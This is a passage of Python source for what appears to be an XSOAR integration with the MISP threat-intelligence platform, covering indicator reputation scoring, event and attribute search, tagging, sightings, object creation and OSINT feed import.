prepare_attributes_array_to_context_data(attributes_list): attributes_tag_ids, event_tag_ids = set(), set() found_related_events = {} if not attributes_list: return None for attribute in attributes_list: attribute.pop("RelatedAttribute") # get rid of this useless list event = attribute.get('Event') convert_timestamp_to_readable(attribute, event) found_related_events[event.get("id")] = {"Event Name": event.get("info"), "Threat Level ID": event.get('threat_level_id'), "Event ID": event.get("id")} if event.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True) event['Tag'] = limit_tag_output event_tag_ids.update(tag_ids) if attribute.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False) attribute['Tag'] = limit_tag_output attributes_tag_ids.update(tag_ids) return found_related_events, attributes_tag_ids, event_tag_ids def convert_timestamp_to_readable(attribute, event): if attribute.get('timestamp'): attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp')) if event: if event.get('timestamp'): attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp')) if event.get('publish_timestamp'): attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string( event.get('publish_timestamp')) def found_event_with_bad_threat_level_id(found_related_events): bad_threat_level_ids = ["1", "2", "3"] for event in found_related_events.values(): if event['Threat Level ID'] in bad_threat_level_ids: return True return False def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level): """ Calculates the indicator score by following logic. Indicators of attributes and Events that: * have tags which configured as malicious will be scored 3 (i.e malicious). * have tags which configured as suspicious will be scored 2 (i.e suspicious). * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown. note: - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will be scored as malicious. - Attributes tags (both malicious and suspicious) are stronger than events' tags. """ found_tag = None is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids) if is_attribute_tag_malicious: return Common.DBotScore.BAD, found_tag is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids) if is_attribute_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids) if is_event_tag_malicious: return Common.DBotScore.BAD, found_tag is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids) if is_event_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag # no tag was found if is_attribute_in_event_with_bad_threat_level: return Common.DBotScore.BAD, None return Common.DBotScore.NONE, None def get_new_misp_event_object(args): """ Create a new MISP event object and set the event's details. """ event = MISPEvent() event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')] threat_level_id_arg = args.get('threat_level_id') if threat_level_id_arg: event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg] analysis_arg = args.get('analysis') event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg event.info = args.get('info') if args.get('info') else 'Event from XSOAR' event.date = datetime.today() event.published = argToBoolean(args.get('published', 'False')) return event def create_event_command(demisto_args: dict): """Creating event in MISP with the given attribute args""" new_event = get_new_misp_event_object(demisto_args) new_event = PYMISP.add_event(new_event, True) if isinstance(new_event, dict) and new_event.get('errors'): raise DemistoException(new_event.get('errors')) event_id = new_event.id add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args) event = PYMISP.search(eventid=event_id) human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(event), raw_response=event ) def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None): """Adding attribute to a given MISP event object This function can be called as an independence command or as part of another command (create event for example) Args: event_id (int): Event ID to add attribute to internal (bool): if set to True, will not post results to Demisto demisto_args (dict): Demisto args new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to that existing event. """ attributes_args = { 'id': demisto_args.get('event_id'), # misp event id 'type': demisto_args.get('type', 'other'), 'category': demisto_args.get('category', 'External analysis'), 'to_ids': argToBoolean(demisto_args.get('to_ids', True)), 'comment': demisto_args.get('comment'), 'value': demisto_args.get('value') } event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id") attributes_args.update({'id': event_id}) if event_id else None distribution = demisto_args.get('distribution') attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None if not new_event: response = PYMISP.search(eventid=event_id, pythonify=True) if not response: raise DemistoException( f"Error: An event with the given id: {event_id} was not found in MISP. please check it once again") new_event = response[0] # response[0] is MISP event new_event.add_attribute(**attributes_args) PYMISP.update_event(event=new_event) if internal: return value = attributes_args.get('value') updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value) human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(updated_event), raw_response=updated_event ) def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): reputation_value_list = argToList(demisto_args.get(reputation_type), ',') command_results = [] for value in reputation_value_list: command_results.append( get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) return command_results def reputation_value_validation(value, dbot_type): if dbot_type == 'FILE': # hashFormat will be used only in output hash_format = get_hash_type(value) if hash_format == 'Unknown': raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256') if dbot_type == 'IP': if not is_ip_valid(value): raise DemistoException(f"Error: The given IP address: {value} is not valid") if dbot_type == 'DOMAIN': if not re.compile(DOMAIN_REGEX, regexFlags).match(value): raise DemistoException(f"Error: The given domain: {value} is not valid") if dbot_type == 'URL': if not re.compile(urlRegex, regexFlags).match(value): raise DemistoException(f"Error: The given url: {value} is not valid") if dbot_type == 'EMAIL': if not re.compile(emailRegex, regexFlags).match(value): raise DemistoException(f"Error: The given email address: {value} is not valid") def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): """ This function searches for the given attribute value in MISP and then calculates it's dbot score. The score is calculated by the tags ids (attribute tags and event tags). Args: value (str): The indicator value (an IP address, email address, domain, url or file hash). dbot_type (str): Indicator type (file, url, domain, email or ip). malicious_tag_ids (set): Tag ids should be recognised as malicious. suspicious_tag_ids (set): Tag ids should be recognised as suspicious reliability (DBotScoreReliability): integration reliability score. attributes_limit (int) : Limits the number of attributes that will be written to the context Returns: CommandResults includes all the indicator results. """ reputation_value_validation(value, dbot_type) misp_response = PYMISP.search(value=value, controller='attributes', include_context=True, include_correlations=True, include_event_tags=True, enforce_warninglist=True, include_decay_score=True, includeSightings=True) indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type] is_indicator_found = misp_response and misp_response.get('Attribute') if is_indicator_found: outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit) dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=score, reliability=reliability, malicious_description="Match found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) all_attributes = outputs.get('Attribute') events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag) attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable) readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights, removeNull=True) readable_output += tableToMarkdown('Related events', list(found_related_events.values())) return CommandResults(indicator=indicator, raw_response=misp_response, outputs=all_attributes, outputs_prefix='MISP.Attribute', outputs_key_field='ID', readable_output=readable_output) else: dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=Common.DBotScore.NONE, reliability=reliability, malicious_description="No results were found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) return CommandResults(indicator=indicator, readable_output=f"No attributes found in MISP for value: {value}") def get_events_related_to_scored_tag(all_attributes, found_tag): """ This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored as malicious or suspicious. Args: all_attributes (dict): The parsed response from the MISP search attribute request found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is Unknown so no events should be found. Returns: list includes all the events that were detected as related to the tag. """ scored_events = [] if found_tag: for attribute in all_attributes: event = attribute.get('Event', {}) event_name = event.get('Info') scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name)) scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name)) return remove_duplicated_related_events(scored_events) def remove_duplicated_related_events(related_events): related_events_no_duplicates = [] for i in range(len(related_events)): if related_events[i] not in related_events[i + 1:]: related_events_no_duplicates.append(related_events[i]) return related_events_no_duplicates def search_events_with_scored_tag(object_data_dict, found_tag, event_name): """ By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be added to related_events list Args: object_data_dict (dict): Event or attribute dict which includes tags list. found_tag (str): The tag that was scored as malicious or suspicious. event_name (str): Name of the event """ related_events = [] object_tags_list = object_data_dict.get('Tag', []) for tag in object_tags_list: if tag.get('ID') == found_tag: event_id = get_event_id(object_data_dict) tag_name = tag.get('Name') related_events.append({'Event_ID': event_id, 'Event_Name': event_name, 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')}) return related_events def get_event_id(data_dict): if data_dict.get('EventID'): return data_dict.get('EventID') elif data_dict.get('ID'): return data_dict.get('ID') return data_dict.get('Event', {}).get('ID') def get_dbot_indicator(dbot_type, dbot_score, value): if dbot_type == "FILE": hash_type = get_hash_type(value) if hash_type == 'md5': return Common.File(dbot_score=dbot_score, md5=value) if hash_type == 'sha1': return Common.File(dbot_score=dbot_score, sha1=value) if hash_type == 'sha256': return Common.File(dbot_score=dbot_score, sha256=value) if dbot_type == "IP": return Common.IP(ip=value, dbot_score=dbot_score) if dbot_type == "DOMAIN": return Common.Domain(domain=value, dbot_score=dbot_score) if dbot_type == "EMAIL": return Common.EMAIL(address=value, dbot_score=dbot_score) if dbot_type == "URL": return Common.URL(url=value, dbot_score=dbot_score) def build_misp_complex_filter(demisto_query: str): """ Examples are available in UT: test_build_misp_complex_filter. For more information please see build_complex_query in pymisp/api.py Args: demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:' using ',' as delimiter for parameters and ';' as delimiter for operators. using the operators is optional. if 'demisto_query' does not contains any of the complex operators the original input will be returned Returns: str: dictionary created for misp to perform complex query or if no complex query found returns the original input """ regex_and = r'(AND:)([^\;]+)(;)?' regex_or = r'(OR:)([^\;]+)(;)?' regex_not = r'(NOT:)([^\;]+)(;)?' misp_query_params = dict() match_and = re.search(regex_and, demisto_query, re.MULTILINE) match_or = re.search(regex_or, demisto_query, re.MULTILINE) match_not = re.search(regex_not, demisto_query, re.MULTILINE) is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters') is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters') is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters') is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator if is_complex_search: return PYMISP.build_complex_query(**misp_query_params) return demisto_query def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key): is_complex_search = False if match_operator is not None: misp_query_params[operator_key] = match_operator.group(2).split(',') is_complex_search = True return is_complex_search def prepare_args_to_search(controller): demisto_args = demisto.args() args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args} # Replacing keys and values from Demisto to Misp's keys if 'type' in args_to_misp_format: args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type') if 'to_ids' in args_to_misp_format: args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0 if 'from' in args_to_misp_format: args_to_misp_format['date_from'] = args_to_misp_format.pop('from') if 'to' in args_to_misp_format: args_to_misp_format['date_to'] = args_to_misp_format.pop('to') if 'event_id' in args_to_misp_format: args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id')) if 'last' in args_to_misp_format: args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last') if 'include_decay_score' in args_to_misp_format: args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0 if 'include_sightings' in args_to_misp_format: args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0 if 'include_correlations' in args_to_misp_format: args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0 if 'enforceWarninglist' in args_to_misp_format: args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0 if 'include_feed_correlations' in args_to_misp_format: args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get( 'include_feed_correlations') == 'true' else 0 args_to_misp_format.pop('include_feed_correlations') if 'limit' not in args_to_misp_format: args_to_misp_format['limit'] = '50' if 'tags' in args_to_misp_format: args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags']) args_to_misp_format['controller'] = controller demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}") return args_to_misp_format def build_attributes_search_response(response: Union[dict, requests.Response], include_correlations=False) -> dict: """ Convert the response of attribute search returned from MISP to the context output format. """ response_object = copy.deepcopy(response) if include_correlations: # return full related attributes only if the user wants to get them back ATTRIBUTE_FIELDS.append('RelatedAttribute') if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return get_limit_attribute_search_outputs(attributes) def get_limit_attribute_search_outputs(attributes): for i in range(len(attributes)): attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]} build_galaxy_output(attributes[i]) build_tag_output(attributes[i]) build_sighting_output_from_attribute_search_response(attributes[i]) convert_timestamp_to_readable(attributes[i], None) formatted_attributes = replace_keys_from_misp_to_context_data(attributes) return formatted_attributes def build_galaxy_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Galaxy'): given_object['Galaxy'] = [ { 'name': star.get('name'), 'type': star.get('type'), 'description': star.get('description') } for star in given_object['Galaxy'] ] def build_object_output(event): if event.get('Object'): event['Object'] = [ { 'name': event_object.get('name'), 'uuid': event_object.get('uuid'), 'description': event_object.get('description'), 'id': event_object.get('id') } for event_object in event['Object'] ] def build_tag_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Tag'): given_object['Tag'] = [ {'Name': tag.get('name'), 'is_galaxy': tag.get('is_galaxy') } for tag in given_object.get('Tag') ] def build_sighting_output_from_attribute_search_response(attribute): if attribute.get('Sighting'): attribute['Sighting'] = [ {'type': sighting.get('type') } for sighting in attribute.get('Sighting') ] def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list: """returns list of attributes' values that match the search query when user set the arg 'compact' to True""" if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return [attribute.get('value') for attribute in attributes] def pagination_args_validation(page, limit): if page and page < 0: raise DemistoException("page should be zero or a positive number") if limit and limit < 0: raise DemistoException("limit should be zero or a positive number") def attribute_response_to_markdown_table(response: dict): attribute_highlights = [] for attribute in response: event = attribute.get('Event', {}) attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get( 'Tag') else None attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in attribute.get('Sighting')] if attribute.get('Sighting') else None attribute_highlights.append({ 'Attribute ID': attribute.get('ID'), 'Event ID': attribute.get('EventID'), 'Attribute Category': attribute.get('Category'), 'Attribute Type': attribute.get('Type'), 'Attribute Comment': attribute.get('Comment'), 'Attribute Value': attribute.get('Value'), 'Attribute Tags': attribute_tags, 'Attribute Sightings': attribute_sightings, 'To IDs': attribute.get('ToIDs'), 'Timestamp': attribute.get('Timestamp'), 'Event Info': event.get('Info'), 'Event Organization ID': event.get('OrganizationID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID') }) return attribute_highlights def search_attributes(demisto_args: dict) -> CommandResults: """Execute a MISP search over 'attributes'""" args = prepare_args_to_search('attributes') outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False)) include_correlations = argToBoolean(demisto_args.get('include_correlations', False)) page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: if outputs_should_include_only_values: response_for_context = build_attributes_search_response_return_only_values(response) number_of_results = len(response_for_context) md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes", response_for_context[:number_of_results], ["Value"]) else: response_for_context = build_attributes_search_response(response, include_correlations) attribute_highlights = attribute_response_to_markdown_table(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}", attribute_highlights, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Attribute", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}") def build_events_search_response(response: Union[dict, requests.Response]) -> dict: """ Convert the response of event search returned from MISP to the context output format. please note: attributes are excluded from search-events output as the information is too big. User can use the command search-attributes in order to get the information about the attributes. """ response_object = copy.deepcopy(response) if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) events = [event.get('Event') for event in response_object] for i in range(0, len(events)): # Filter object from keys in event_args events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]} events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event build_galaxy_output(events[i]) build_tag_output(events[i]) build_object_output(events[i]) events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp')) events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp')) formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore return formatted_events # type: ignore def event_to_human_readable_tag_list(event): event_tags = event.get('Tag', []) if event_tags: return [tag.get('Name') for tag in event_tags] def event_to_human_readable_galaxy_list(event): event_galaxies = event.get('Galaxy', []) if event_galaxies: return [galaxy.get('Name') for galaxy in event.get('Galaxy')] def event_to_human_readable_object_list(event): event_objects = event.get('Object', []) if event_objects: return [event_object.get('ID') for event_object in event.get('Object')] def event_to_human_readable(response: dict): event_highlights = [] for event in response: event_tags = event_to_human_readable_tag_list(event) event_galaxies = event_to_human_readable_galaxy_list(event) event_objects = event_to_human_readable_object_list(event) event_highlights.append({ 'Event ID': event.get('ID'), 'Event Tags': event_tags, 'Event Galaxies': event_galaxies, 'Event Objects': event_objects, 'Publish Timestamp': event.get('PublishTimestamp'), 'Event Info': event.get('Info'), 'Event Org ID': event.get('OrganizationID'), 'Event Orgc ID': event.get('OwnerOrganization.ID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID'), }) return event_highlights def search_events(demisto_args: dict) -> CommandResults: """ Execute a MISP search using the 'event' controller. """ args = prepare_args_to_search('events') page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: response_for_context = build_events_search_response(response) event_outputs_to_human_readable = event_to_human_readable(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}", event_outputs_to_human_readable, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Event", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}") def delete_event(demisto_args: dict): """ Gets an event id and deletes it. """ event_id = demisto_args.get('event_id') response = PYMISP.delete_event(event_id) if 'errors' in response: raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}') else: human_readable = f'Event {event_id} has been deleted' return CommandResults(readable_output=human_readable, raw_response=response) def add_tag(demisto_args: dict, is_attribute=False): """ Function will add tag to given UUID of event or attribute. is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False). """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: PYMISP.tag(uuid, tag) # add the tag except PyMISPError: raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully added to attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully added to event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def remove_tag(demisto_args: dict, is_attribute=False): """ Function will remove tag to given UUID of event or attribute. is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's. """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: response = PYMISP.untag(uuid, tag) if response and response.get('errors'): raise DemistoException(f'Error in `{demisto.command()}` command: {response}') except PyMISPError: raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully removed from the event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def add_sighting(demisto_args: dict): """Adds sighting to MISP attribute """ attribute_id = demisto_args.get('id') attribute_uuid = demisto_args.get('uuid') sighting_type = demisto_args['type'] # mandatory arg att_id = attribute_id or attribute_uuid if not att_id: raise DemistoException('ID or UUID not specified') sighting_args = { 'id': attribute_id, 'uuid': attribute_uuid, 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type] } sigh_obj = MISPSighting() sigh_obj.from_dict(**sighting_args) response = PYMISP.add_sighting(sigh_obj, att_id) if response.get('message'): raise DemistoException(f"An error was occurred: {response.get('message')}") elif response.get('Sighting'): human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}' return CommandResults(readable_output=human_readable) raise DemistoException(f"An error was occurred: {json.dumps(response)}") def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ Test module. """ is_tag_list_valid(malicious_tag_ids) is_tag_list_valid(suspicious_tag_ids) if attributes_limit < 0: raise DemistoException('Attribute limit has to be a positive number.') response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json') if PYMISP._check_json_response(response): return 'ok' else: raise DemistoException('MISP has not connected.') def build_feed_url(demisto_args): url = demisto_args.get('feed') url = url[:-1] if url.endswith('/') else url if PREDEFINED_FEEDS.get(url): url = PREDEFINED_FEEDS[url].get('url') # type: ignore return url def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict): """Gets an OSINT feed from url and publishing them to MISP urls with feeds for example: https://www.misp-project.org/feeds/ feed format must be MISP. """ headers = {'Accept': 'application/json'} url = build_feed_url(demisto_args) osint_url = f'{url}/manifest.json' limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True) try: uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json() events_ids = list() # type: List[Dict[str, int]] for index, uri in enumerate(uri_list, 1): response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json() misp_new_event = MISPEvent() misp_new_event.load(response) add_event_response = PYMISP.add_event(misp_new_event) event_object = add_event_response.get('Event') if event_object and 'id' in event_object: events_ids.append({'ID': event_object['id']}) if limit == len(events_ids): break human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=events_ids, ) except ValueError as e: raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}') def add_object(event_id: str, obj: MISPObject): """Sending object to MISP and returning outputs Args: obj: object to add to MISP event_id: ID of event """ response = PYMISP.add_object(event_id, misp_object=obj) if 'errors' in response: raise DemistoException(f'Error in `{demisto.command()}` command: {response}') for ref in obj.ObjectReference: response = PYMISP.add_object_reference(ref) for attribute in response.get('Object', {}).get('Attribute', []): convert_timestamp_to_readable(attribute, None) response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp')) formatted_response = replace_keys_from_misp_to_context_data(response) formatted_response.update({"ID": event_id}) human_readable = f'Object has been added to MISP event ID {event_id}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=formatted_response, ) def add_file_object(demisto_args: dict): entry_id = demisto_args.get('entry_id') event_id = demisto_args.get('event_id') file_path = demisto.getFilePath(entry_id).get('path') obj = FileObject(file_path) return add_object(event_id, obj) def add_domain_object(demisto_args: dict): """Adds a domain object to MISP domain-ip description: https://www.misp-project.org/objects.html#_domain_ip """ text = demisto_args.get('text') event_id = demisto_args.get('event_id') domain = demisto_args.get('name') obj = MISPObject('domain-ip') ips = argToList(demisto_args.get('ip')) for ip in ips: obj.add_attribute('ip', value=ip) obj.add_attribute('domain', value=domain) if text: obj.add_attribute('text', value=text) return add_object(event_id, obj) def add_url_object(demisto_args: dict): """Building url object in MISP scheme Scheme described https://www.misp-project.org/objects.html#_url """ url_args = [ 'text', 'last_seen', 'first_seen' ] event_id = demisto_args.get('event_id') url = demisto_args.get('url') url_parse = urlparse(url) url_obj = [{'url': url}] url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None url_obj.append({'query_string': url_parse.query}) if url_parse.query else None url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None url_obj.append({'port': url_parse.port}) if url_parse.port else None url_obj.append( {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args)) g_object = build_generic_object('url', url_obj) return add_object(event_id, g_object) def add_generic_object_command(demisto_args: dict): event_id = demisto_args.get('event_id') template = demisto_args.get('template') attributes = demisto_args.get('attributes').replace("'", '"') try: args = json.loads(attributes) if not isinstance(args, list): args = dict_to_generic_object_format(args) obj = build_generic_object(template, args) return add_object(event_id, obj) except ValueError as e: raise DemistoException( f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e)) def convert_arg_to_misp_args(demisto_args, args_names): return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)] def add_ip_object(demisto_args: dict): event_id = demisto_args.get('event_id') ip_object_args = [ 'dst_port', 'src_port', 'domain', 'hostname', 'ip_src', 'ip_dst' ] # converting args to MISP's arguments types misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args) ips = argToList(demisto_args.get('ip')) for ip in ips: misp_attributes_args.append({'ip': ip}) if misp_attributes_args: non_req_args = [ 'first_seen', 'last_seen', ] misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args)) misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None obj = build_generic_object('ip-port', misp_attributes_args) return add_object(event_id, obj) else: raise DemistoException( f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}') def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids): """ Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is stronger than recognised as suspicious). """ common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids) suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids} return malicious_tag_ids, suspicious_tag_ids def is_tag_list_valid(tag_ids): """Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.""" for tag in tag_ids: try: tag = int(tag) if tag <= 0: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") except ValueError: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute: attribute_type = demisto_args.get('type') distribution = demisto_args.get('distribution') category = demisto_args.get('category') comment = demisto_args.get('comment') value = demisto_args.get('value') first_seen = demisto_args.get('first_seen') last_seen = demisto_args.get('last_seen') attribute_instance = MISPAttribute() attribute_instance.uuid = attribute_uuid if attribute_type: attribute_instance.type = attribute_type if distribution: attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution] if category: attribute_instance.category = category if value: attribute_instance.value = value if comment: attribute_instance.comment = comment if first_seen: attribute_instance.first_seen = first_seen if last_seen: attribute_instance.last_seen = last_seen return attribute_instance def update_attribute_command(demisto_args: dict) -> CommandResults: attribute_uuid = demisto_args.get('attribute_uuid') attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid) attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid) if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'): raise DemistoException(attribute_instance_response.get('errors')) human_readable = f"## 